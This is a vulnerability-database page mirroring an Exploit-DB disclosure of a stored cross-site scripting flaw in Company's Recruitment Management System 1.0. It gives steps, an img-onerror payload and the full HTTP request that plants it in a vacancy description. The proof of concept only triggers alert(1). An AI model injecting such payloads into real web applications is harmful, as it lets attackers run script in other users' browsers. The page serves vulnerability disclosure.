Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)

🗓️ 18 Oct 2021 00:00:00Reported by Aniket DeshmaneType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 300 Views

Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS) vulnerabilit

Code
# Exploit Title: Company's Recruitment Management System 1.0 -  'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Step to reproduce:-
1)Login with staff account & Navigate to  Vacancies tab.

2)Click on add new vacancies .Put any random information  on other field except description & go to the description window .

3)In the description field  select insert  link .

5) In Text to display the field add the following payload .

"><img src=x onerror=alert(1)>

*6)Click on save & you are done.It's gonna be triggered when some one open
vacancies details  *

Request:-

POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------156186133432167175201476666002
Content-Length: 1012
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="id"


-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="title"

Test1ee
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="designation_id"

4
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="slots"

1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="status"

1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="description"

<p><br><a href="http://google.com" target="_blank">"><img src="x"
onerror="alert(1)"></a></p>
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------156186133432167175201476666002--

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Oct 2021 00:00Current
7.4High risk
Vulners AI Score7.4
cross-site scriptingvulnerability disclosureexploitrecruitment management systemsource codefreesql injectionwindows 10xampppayloadalertxmlhttprequestform data
300